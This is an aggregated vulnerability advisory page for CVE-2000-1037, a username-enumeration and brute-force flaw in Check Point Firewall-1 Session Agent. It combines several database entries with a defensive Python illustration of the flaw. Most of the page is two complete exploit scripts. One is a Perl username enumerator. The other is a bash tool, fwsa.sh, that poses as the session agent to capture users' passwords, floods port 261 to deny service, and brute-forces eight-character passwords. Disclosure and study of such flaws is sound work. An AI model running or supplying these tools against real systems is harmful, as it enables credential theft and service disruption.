CVE-2000-1037
CVSS 7.5
Published: 2000-12-11 00:00:00
Revised: 2008-09-05 16:22:29

[Original] Check Point Firewall-1 session agent 3.0 through 4.1 generates different error messages for invalid user names versus invalid passwords, which allows remote attackers to determine valid usernames and guess a password via a brute force attack.


[CNNVD] Check Point Firewall-1 Session Agent Dictionary Attack Vulnerability (CNNVD-200012-078)

Check Point Firewall-1 Session Agent versions 3.0 through 4.1 return a different error message for an invalid user name than for an invalid password. A remote attacker can combine this with a brute-force attack to determine valid user names and then guess their passwords.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may be degraded or access to resources interrupted]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/a:checkpoint:firewall-1:4.0    Checkpoint Firewall-1 4.0
cpe:/a:checkpoint:firewall-1:4.1    Checkpoint Firewall-1 4.1
cpe:/a:checkpoint:firewall-1:3.0    Checkpoint Firewall-1 3.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1037
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1037
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200012-078
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/1662
(VENDOR_ADVISORY)  BID  1662
http://www.securityfocus.com/archive/1/76389
(VENDOR_ADVISORY)  BUGTRAQ  20000815 Firewall-1 session agent 3.0 -> 4.1, dictionnary and brute force attack

- Vulnerability information

Check Point Firewall-1 Session Agent Dictionary Attack Vulnerability
Severity: High    Type: Design Error
Published: 2000-12-11 00:00:00    Updated: 2005-10-20 00:00:00
Attack path: Remote
Check Point Firewall-1 Session Agent versions 3.0 through 4.1 return a different error message for an invalid user name than for an invalid password. A remote attacker can combine this with a brute-force attack to determine valid user names and then guess their passwords.

- Advisories and patches

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Vulnerability information (20215)

Check Point Software Firewall-1 3.0/1 4.0/1 4.1 Session Agent Dictionary Attack (1) (EDBID:20215)
Platform: multiple    Type: remote
Date: 2000-08-15    Verified
Port: 0    Author: Nelson Brito
N/A
source: http://www.securityfocus.com/bid/1662/info

A vulnerability exists in all versions of the Check Point Session Agent, part of Firewall-1. Session Agent works in such a way that the firewall will establish a connection back to the client machine. Upon doing so, it will prompt for a username, and if the username exists, a password. Upon failure, it will reprompt indefinitely. This allows for a simple brute force attack against the username and password.

#!/usr/bin/perl -w
#
# File  :       brute-fw1-agent.pl
# Author:       Nelson Brito<nelson@secunet.com.br || nelson@sekure.org>
#
# Untested code, use on your own risc.
#
use Socket;

$c = 0; $port = 261; #$proto = getprotobyname('tcp');

socket(FAGENT, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "socket: $!";
setsockopt(FAGENT, SOL_SOCKET, SO_REUSEADDR, pack("l", 1))  or die "setsockopt: $!";
bind(FAGENT, sockaddr_in($port, INADDR_ANY))                or die "bind: $!";
listen(FAGENT, SOMAXCONN)                                   or die "listen: $!";

open(SDI, "users") or die "open: $!\n";
until(eof(SDI)){
        $user = <SDI>; chomp($user);
        next if ($user=~/^\s*#/);
        next if ($user=~/^\s*$/);
        push @users, $user;
}
close(SDI);

while(accept(MODULE, FAGENT)){
LINE:   $c++;
        print STDOUT "[+] Hii... I'm on TV $c times!\n";
        recv(MODULE, $target, 1024, 0);
        if($target=~/^331/i){
                chomp($users[0]);
                send(MODULE, "$users[0]\n", 0);
                recv(MODULE, $target, 1024, 0);
                if($target=~/^220/){
                        recv(MODULE, $target, 1024, 0);
                        if($target=~/^530/){
                                shift @users; goto LINE;
                        }else{
                                die "[-] Unknown code. What happened?\n";
                        }
                }elsif($target=~/^331/){
                        print STDOUT "[+] The $users[0] username is right!\n";
                }else{
                        die "[-] Unknown return code. What happened?\n";
                }
        }else{
                die "[-] Unknown return code. What happened?\n";
        }

}

- Vulnerability information (20216)

Check Point Software Firewall-1 3.0/1 4.0/1 4.1 Session Agent Dictionary Attack (2) (EDBID:20216)
Platform: multiple    Type: remote
Date: 2000-10-01    Verified
Port: 0    Author: Gregory Duchemin
N/A
source: http://www.securityfocus.com/bid/1662/info

A vulnerability exists in all versions of the Check Point Session Agent, part of Firewall-1. Session Agent works in such a way that the firewall will establish a connection back to the client machine. Upon doing so, it will prompt for a username, and if the username exists, a password. Upon failure, it will reprompt indefinitely. This allows for a simple brute force attack against the username and password.


#!/bin/bash
#
# Fwsa (FW-1 session auth), tested on linux 2.4.0 beta
# ( Swiss army knife for FW-1 Session authentication. )
#
# successfully tested against Session Authentication Agents 4.0 & 4.1
# and Firewall-1 module 4.0 
#
# please don't use it for any illegal activity but only for educational purposes
#
#         Gregory Duchemin   ( aka c3rb3r )
# 
#     for help or bug report <==> c3rb3r@hotmail.com

# 0ctober 2000

function Usage()
{
echo
echo " Usage: "$0" Targets_filez  type_of_attack [FQDN name] [dict file] [0/1/2/3]"
echo
echo "================proof of concept // Version 1.0 ==="
echo "==================================================="
echo
echo " Note: Targets_filez is a plaintext file with all IPs to check"
echo "       I recommend u to make it with the help of Nmap "
echo "       Try nmap -T Insane -sS -P0 -p 261 RANGE_IP to look for listening session agents." 
echo " Note: Type of attack is 1 for password recovery, 2 for stupid DOS, 3 for "
echo "       dangerous DOS and 4 for bruteforcing users password on Firewall"
echo
echo "       * password recovery will turn you back user FW1 login/password"
echo "       * stupid DOS just open a connexion and wait for nothing"
echo "         It'll block all other connexion and so, user access."
echo "       * dangerous DOS will enter an infinite loop within it send garbage."
echo "         Will crash some weak systems. ( find wich ones ;) ) "
echo "       * passwords Brute-force try to guess users password onto "
echo "         the corporate firewall. Have to supply an external address in filez"
echo "         to force firewall to connect on local port ( port 261 )."
echo
echo " Note: FQDN name is Fully Qualified Domain name, default:firewall used for FW-1 "
echo " banner."
echo " Note: Change the internal variables filez and logfile to store your stock into, default:\"...\""
echo " Note: this proggy needs netcat to nicely work."
echo 
echo " G00d Hunt !"
echo 
echo " author:  Gregory Duchemin  ( aka c3rb3r )"
echo "                          c3rb3r@hotmail.com "
echo 
echo " N0 c0pyright, feel free to use or modify it as u want"
echo
}

signal_handler()
{
sync
echo 
echo "Warning: target aborted, continuing with next one..."
echo
echo
}


filtered()
{
echo
echo "Error: target port 261 doesn't respond"
echo "       it should be because target is filtering or is down." 
echo "       Anyway, try again spoofing firewall address."
echo "       Arptool should be helpfull to do the job"
echo
}

closed()
{
echo
echo "Error: target port 261 is closed"
echo "       continuing with next ip." 
echo
echo
}

simple_dos()
{
for i in $ip; do 
echo
echo "***********************************************"
echo "Launching stupid DOS attack against "$i" !"
echo "***********************************************"
echo
echo
{
sleep $timeout 
sync
}| nc -n -w 2 -v $i 261 > $logfile 2>&1
if [ `awk '{ print $7 }' $logfile` = "refused" ]; then
closed
else
if [ `awk '{ print $7 }' $logfile` = "timed" ]; then
filtered
fi
fi
done
rm $logfile
echo
echo "DOS terminated. ( Hope it's ok)"
echo
}


dangerous_dos()
{
for i in $ip; do 
echo
echo "****************************************************"
echo "Launching dangerous DOS attack against "$i" !"
echo "****************************************************"
echo
echo
{
sleep $timeout 
cat /dev/random
}| nc -n -w 2 -v $i 261  > $logfile 2>&1
if [ $( awk '{ print $7 }' $logfile) = "refused" ]; then
closed
else 
if [ $(awk '{ print $7 }' $logfile) = "timed" ]; then
filtered
fi
fi
done
rm $logfile
echo
echo "DOS terminated. ( Hope it's ok)"
echo
}


password_recovery()
{
for i in $ip; do 
echo
echo "*****************************************************"
echo "Launching FW1 password recovery against "$i" !"
echo "*****************************************************"
echo
echo
{
sleep $timeout 
sync 
cat /dev/null > $logfile
echo "220 FW-1 Session Authentication Request from "$name
echo "211 253141732 1988 3931424644 80 5"
echo "331 User:"
sync
# synchronisation of buffers and disks  
while [ ! -s $logfile ]; do 
# waiting for user info supply in logfile 
sleep 1
done
user=$(cat $logfile)

echo "331 *Firewall-1 password:"

while [ `wc -l $logfile|awk '{ print $1 }'` -eq 1 ]; do
sleep 1
done
sed 's/'$user'//' $logfile | sed '/./,$!d' > ./tmp
password=$(cat ./tmp)
rm ./tmp
echo "200 User $user authenticated by Firewall-1 authentication."
echo "230 OK"
sleep 2
echo >> $filez
echo >> $filez
echo "===== Password recovery ============================================" >> $filez
echo "====================================================================" >> $filez
echo " Target <==> $i" >> $filez 
echo >> $filez 
echo " Username <==> $user    Password <==> $password" >> $filez
echo >> $filez 
echo >> $filez 
exit 0
}| nc  -n -w 2 -v $i 261  > $logfile
if [ -f ./tmp ]; then
rm tmp
fi
done
if [ -f $logfile ]; then
rm $logfile
fi
echo
echo "Done. ( see "$filez" to read stolen informations)"
echo
}



password_bruteforce()
{
for i in $ip; do 


echo
echo "*****************************************************"
echo "Launching FW1 password BruteForce attack "
echo "*****************************************************"
echo
echo


if [ -s $logfile ]; then
cat /dev/null > $logfile
fi

# We use as many char string as there are in password because
# most of the time, admin won't use a "real" random generator but 
# a program that use a basic scheme.
# if u understand this scheme and modify the string below, u should be able to increase significantly your chances of succeed.  
# if passwords in your company are less than 8 chars, comment useless lines 

# password scheme:
# for instance, first letter could be uppercase ( A or H string depending on order byte ).
# initial values are commented

#A='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
A='A B C D E F G H I J K L M N O P Q R S T U V W X Y Z'

B='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
C='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
D='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
E='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
F='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
G='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
H='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
{
# we send a probe to anywhere in the world port 80 (or whatever fw rules allow), waiting for FW answer 
nc -w 2 -n $i 80 > /dev/null 2>&1

# waiting for invitation caller  
grep 331 $logfile > /dev/null
while [ $? -eq 1 ]; 
do 
grep 331 $logfile > /dev/null
done

# we try now our login names until we get back the magic cookie
# actually we read login names in a file, it should be more efficient since most of admins use real names.
# u can use brute force to guess login in the same manner we use it for passwords.
# in this case, just change the few lines below to use chars strings from 1 up to 8 loops.

for user in $username
do
cat /dev/null > $logfile
sync
echo $user

# 530 eg NOTOK, error response
# fw1 session authentication reply with an error code if username doesn't exist, that's a flaw in itself.

sleep $timeout 

grep 530 $logfile > /dev/null
if [ $? -eq 1 ]; then
echo "===== Password Brute force ============================================" >> $filez
echo "====================================================================" >> $filez
echo >> $filez
echo >> $filez
echo " login ok :"$user >> $filez
echo >> $filez
echo >> $filez
echo $user >> ./.users
sync
continue
fi
done

if [ ! -f ./.users ]; then 
exit
fi

targets=`cat ./.users`
rm ./.users
 
# Now it's time  we try to guess password for this user
# if passwords in your company are less than 8 chars, comment useless loops.


for user in $targets
do
 
for i8 in $H 
do
for i7 in $G
do

# this rule is optional
if [ $i7 = $i8 ]; then
continue
fi

for i6 in $F
do

# this rule is optional
if [ $i6 = $i7 ]; then
continue
fi

for i5 in $E
do

# this rule is optional
if [ $i5 = $i6 ]; then
continue
fi

for i4 in $D 
do

# this rule is optional
if [ $i4 = $i5 ]; then
continue
fi

for i3 in $C
do

# this rule is optional
if [ $i3 = $i4 ]; then
continue
fi

for i2 in $B
do

# this rule is optional
if [ $i2 = $i3 ]; then
continue
fi

for i1 in $A
do

# this rule is optional
if [ $i1 = $i2 ]; then
continue
fi


# waiting for server

grep 331 $logfile > /dev/null
while [ $? -eq 1 ];
do 
grep 331 $logfile > /dev/null
done


# order is fetched by the user (see usage), and may be usefull for multi-process bruteforce.

if [ $order -eq 0 ]; then
echo $i1$i2$i3$i4$i5$i6$i7$i8
# for debugging purpose
echo "trying $i1$i2$i3$i4$i5$i6$i7$i8" >> $filez
else
if [ $order -eq 1 ]; then
echo $i1$i7$i6$i5$i4$i3$i2$i8
echo "trying $i1$i7$i6$i5$i4$i3$i2$i8" >> $filez
else
if [ $order -eq 2 ]; then
echo $i1$i5$i8$i2$i4$i7$i3$i6
echo "trying $i1$i5$i8$i2$i4$i7$i3$i6" >> $filez
else
echo $i1$i2$i4$i7$i8$i3$i6$i5
echo "trying $i1$i2$i4$i7$i8$i3$i6$i5" >> $filez
fi
fi
fi
sync 
usleep $utimeout 

# 230 eg OK, password is correct 

grep 230 $logfile > /dev/null
if [ $? -eq 0 ]; then
echo >> $filez
if [ $order -eq 0 ]; then
echo "password ok :"$i1$i2$i3$i4$i5$i6$i7$i8 >> $filez
else
if [ $order -eq 1 ]; then
echo "password ok :"$i8$i7$i6$i5$i4$i3$i2$i1 >> $filez
else
if [ $order -eq 2 ]; then
echo "password ok :"$i8$i5$i1$i2$i4$i7$i3$i6 >> $filez
else
echo "password ok :"$i2$i1$i4$i7$i8$i3$i6$i5 >> $filez
fi
fi
fi
echo >> $filez
echo >> $filez
exit
fi

# we r supposed to reinject username each time, this one we just discovered
# but connexion is still alive that's the major flaw.

grep 331 $logfile > /dev/null
while [ $? -eq 1 ];
do 
grep 331 $logfile > /dev/null
done

echo $user
done
done
done
done
done
done
done
done

done
}| nc  -n  -l -p 261  > $logfile 2>&1

#if [ -f $logfile ]; then
#rm $logfile
#fi
done
echo
echo "Done. ( see "$filez" to read stolen informations)"
echo
}



if [ $# -lt 2 ]; then
Usage
exit
fi

nc -h  > /dev/null 2>&1
if [ ! $? -eq 1 ]; then
Usage
echo
echo
echo "Error: "$0" needs netcat to properly run, please check u have it in your \$PATH or compile it now."
echo
exit
fi 

if [ ! $2 -eq 1 ] && [ ! $2 -eq 2 ] && [ ! $2 -eq 3 ] && [ ! $2 -eq 4 ]; then
Usage
echo
echo
echo "Error: Value for type of attack is out of range."
echo
exit
fi

if [ ! -s $1 ]; then
Usage
echo
echo
echo "Error: "$0" didn't find your Targets_ip filez."
echo
exit
fi

trap signal_handler SIGINT


ip=`cat $1`


# filez is where results are writen, please change it for your configuration
# don't forget to change this values for every instance of the process, u would like to launch
filez="./......"
logfile="./logfile4"

cat /dev/null > $filez

name="fwl01"

# timeout is connexion timer when waiting for a server response.

timeout=2


# utimeout is pretty important, specifically for brute force attack, lower value means faster loop but if too low, fw reply would be mistaken
# that depends of your network round trip time and average firewall cpu usage.
# try different values first: default 22 millisecond

utimeout=22000

if [ $# -gt 2 ]; then
name=$3
fi
if [ $# -gt 2 ] && [ $2 -eq 4 ]; then
if [ ! -s $3 ]; then
Usage
echo
echo "Error: "$0" didn't find your dict filez or it's empty."
echo
exit
fi
username=`cat $3`
fi

order=0
if [ $# -gt 3 ]; then
order=$4
fi

if [ -f $logfile ]; then
rm -f $logfile
fi

case "$2" in 
1)
   password_recovery
   ;;

2)
  simple_dos
  ;;

3)
  dangerous_dos
  ;;

4)
  password_bruteforce
  if [ -s $filez ]; then
  cat $filez
  fi
  ;;

*)
  exit 1
esac
exit

- Vulnerability information

4424
Check Point FireWall-1 Session Agent Account Disclosure
Location: Remote / Network Access    Type: Information Disclosure
Impact: Loss of Confidentiality    Solution: Unknown
Exploit: Public    Disclosure: Third-party Verified

- Vulnerability description

Check Point FireWall-1 contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a remote attacker attempts to authenticate to the firewall. The session agent returns different error messages for valid versus invalid user names. This allows a remote attacker to quickly verify the existence of a valid account, resulting in a loss of confidentiality.

- Timeline

2000-08-15 Unknown
2000-08-15 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Vulnerability information

Check Point Firewall-1 Session Agent Dictionary Attack Vulnerability
Class: Design Error    BID: 1662
Remote: Yes    Local: No
Published: 2000-08-15 12:00:00    Updated: 2009-07-11 02:56:00
This vulnerability was posted to the Bugtraq mailing list on August 15, 2000 by Gregory Duchemin <c3rb3r@hotmail.com>

- Affected program versions

Check Point Software Firewall-1 4.1
Check Point Software Firewall-1 4.0
Check Point Software Firewall-1 3.0

- Discussion

A vulnerability exists in all versions of the Check Point Session Agent, part of Firewall-1. Session Agent works in such a way that the firewall will establish a connection back to the client machine. Upon doing so, it will prompt for a username, and if the username exists, a password. Upon failure, it will reprompt indefinitely. This allows for a simple brute force attack against the username and password.
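As an added illustration (not code from the advisory, from the exploit authors above, or from Check Point), the following Python models the 331/230/530 reply dialogue that the discussion sections and both exploit listings describe, first with the reported behaviour and then with the two changes a defender would want: one uniform failure reply whether or not the account exists, and a cap on failed attempts instead of reprompting indefinitely. The credential store, the hashing, the lockout threshold and the closing messages are constructed for this example.

```python
import hashlib
import hmac

MAX_FAILURES = 3  # constructed lockout threshold, not a Firewall-1 setting


def _h(pw):
    # Constructed demo store: salted SHA-256 stands in for the real credential check.
    return hashlib.sha256(b"demo-salt:" + pw.encode()).hexdigest()


USERS = {"alice": _h("correct horse"), "bob": _h("hunter2")}
_DUMMY = _h("not-a-real-password")  # compared for unknown users so both paths do equal work


def vulnerable_agent(user, password):
    """As reported: an unknown account is rejected at the username prompt, so
    '530' versus '331' tells the client whether the account exists."""
    if user not in USERS:
        return ["530 Invalid user"]
    if hmac.compare_digest(USERS[user], _h(password)):
        return ["331 *Firewall-1 password:", "230 OK"]
    return ["331 *Firewall-1 password:", "530 Invalid password"]


def hardened_agent(user, password):
    """Always prompts for a password and answers every failure with the same
    reply, so the username step no longer acts as an oracle."""
    stored = USERS.get(user, _DUMMY)
    ok = hmac.compare_digest(stored, _h(password)) and user in USERS
    return ["331 *Firewall-1 password:", "230 OK" if ok else "530 Login incorrect"]


def leaks_user_existence(agent):
    """True if replies differ between an unknown account and a known account with
    a wrong password: exactly the difference the dictionary tools key on."""
    return agent("nosuchuser", "x") != agent("alice", "x")


class HardenedSession:
    """One client connection that closes after MAX_FAILURES bad attempts instead
    of reprompting indefinitely (the second weakness in the discussion above)."""

    def __init__(self):
        self.failures = 0
        self.open = True

    def attempt(self, user, password):
        if not self.open:
            return ["connection closed"]
        replies = hardened_agent(user, password)
        if replies[-1] != "230 OK":
            self.failures += 1
            if self.failures >= MAX_FAILURES:
                self.open = False
                replies.append("too many failures, closing")
        return replies
```

`leaks_user_existence` is the check to run against any such agent: the reported agent fails it, the hardened one passes.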

- Exploit

Nelson Brito <nelson@secunet.com.br || nelson@sekure.org> provided the brute-fw1-agent.pl exploit.
Gregory Duchemin <c3rb3r@hotmail.com> submitted the fwsa.sh exploit.

- Solution

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.
